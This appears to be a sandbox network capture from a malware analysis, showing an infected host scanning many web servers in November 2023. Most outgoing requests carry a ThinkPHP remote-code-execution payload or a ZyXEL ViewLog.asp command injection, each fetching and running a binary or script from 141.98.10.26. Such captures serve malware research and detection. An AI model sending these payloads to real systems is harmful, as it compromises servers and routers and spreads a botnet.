20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr /><i><small>Powered by Jetty://</small></i><br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/> <br/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
586	192.168.2.23	47912	95.100.150.46	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:25.180253983 CET	11561	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:25.363692045 CET	11646	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:25 GMT Date: Wed, 22 Nov 2023 07:39:25 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 36 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 30 36 33 38 37 36 35 26 23 34 36 3b 63 35 65 65 30 65 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a6a571d4.1700638765.c5ee0ec</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
587	192.168.2.23	41722	112.175.196.211	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:25.671508074 CET	11672	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:25.956897974 CET	11678	IN	HTTP/1.1 302 Object Moved Location: https://pm.plaync.com/l2mru_coupon/ Content-Type: text/html Cache-Control: private Connection: close Data Raw: 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 20 54 68 69 73 20 6f 62 6a 65 63 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 70 6d 2e 70 6c 61 79 6e 63 2e 63 6f 6d 2f 6c 32 6d 72 75 5f 63 6f 75 70 6f 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 20 3c 2f 62 6f 64 79 3e Data Ascii: <head><body> This object may be found <a HREF="https://pm.plaync.com/l2mru_coupon/">here</a> </body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
588	192.168.2.23	53900	112.164.250.90	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:25.680413961 CET	11673	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.066425085 CET	11683	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.363612890 CET	11781	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 22 Nov 2023 07:39:24 GMT Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
589	192.168.2.23	45206	112.126.78.126	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:25.695375919 CET	11674	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.004484892 CET	11681	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:39:25 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 181 Keep-Alive: timeout=15, max=300 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h\|~tF

Session ID	Source IP	Source Port	Destination IP	Destination Port
590	192.168.2.23	39390	112.126.68.220	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:25.697817087 CET	11675	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.009283066 CET	11682	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:39:25 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
591	192.168.2.23	51350	95.129.47.98	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:25.898767948 CET	11677	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.125643015 CET	11684	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:26 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
592	192.168.2.23	32976	95.129.23.80	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:26.112226009 CET	11684	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.337101936 CET	11779	IN	HTTP/1.0 400 Bad Request Connection: Keep-Alive
Nov 22, 2023 08:39:26.337172985 CET	11780	IN	Data Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
593	192.168.2.23	45292	95.125.131.70	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:26.308918953 CET	11779	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:27.329919100 CET	11865	IN	HTTP/1.0 200 OK Data Raw: Data Ascii:
Nov 22, 2023 08:39:27.352627993 CET	11865	IN	Data Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 53 49 44 3d 33 65 37 33 35 30 33 35 63 63 66 38 64 37 63 61 31 Data Ascii: Server: GoAhead-WebsX-Frame-Options: SAMEORIGINSet-Cookie: SID=3e735035ccf8d7ca113d0eb4ffffd48d; Max-Age=1200; Version=1Pragma: no-cacheCache-control: no-cacheContent-Type: text/html<html><head></head><body><script language=javascript>

Session ID	Source IP	Source Port	Destination IP	Destination Port
594	192.168.2.23	44532	88.221.130.250	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:26.840313911 CET	11799	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:26.959966898 CET	11801	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:26 GMT Date: Wed, 22 Nov 2023 07:39:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 61 64 37 64 64 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 36 36 26 23 34 36 3b 37 39 30 38 63 63 36 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.1ad7dd17.1700638766.7908cc6b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
595	192.168.2.23	42598	88.221.179.197	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:26.891755104 CET	11800	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:27.062459946 CET	11803	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:26 GMT Date: Wed, 22 Nov 2023 07:39:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 31 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 36 36 26 23 34 36 3b 32 39 38 36 36 32 30 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d13e1202.1700638766.2986620b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
596	192.168.2.23	56214	31.136.151.148	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:27.487097025 CET	11889	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.565809011 CET	12201	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:36.709023952 CET	12988	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.739356041 CET	14367	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.055824041 CET	17347	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:02.200970888 CET	19780	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
597	192.168.2.23	38530	94.120.104.3	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:27.529377937 CET	11891	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
598	192.168.2.23	45292	95.86.104.78	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:27.766405106 CET	11903	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
599	192.168.2.23	37426	94.123.187.131	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:28.530397892 CET	12006	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
600	192.168.2.23	52770	31.200.119.199	8080

Timestamp	kBytes transferred	Direction	Data
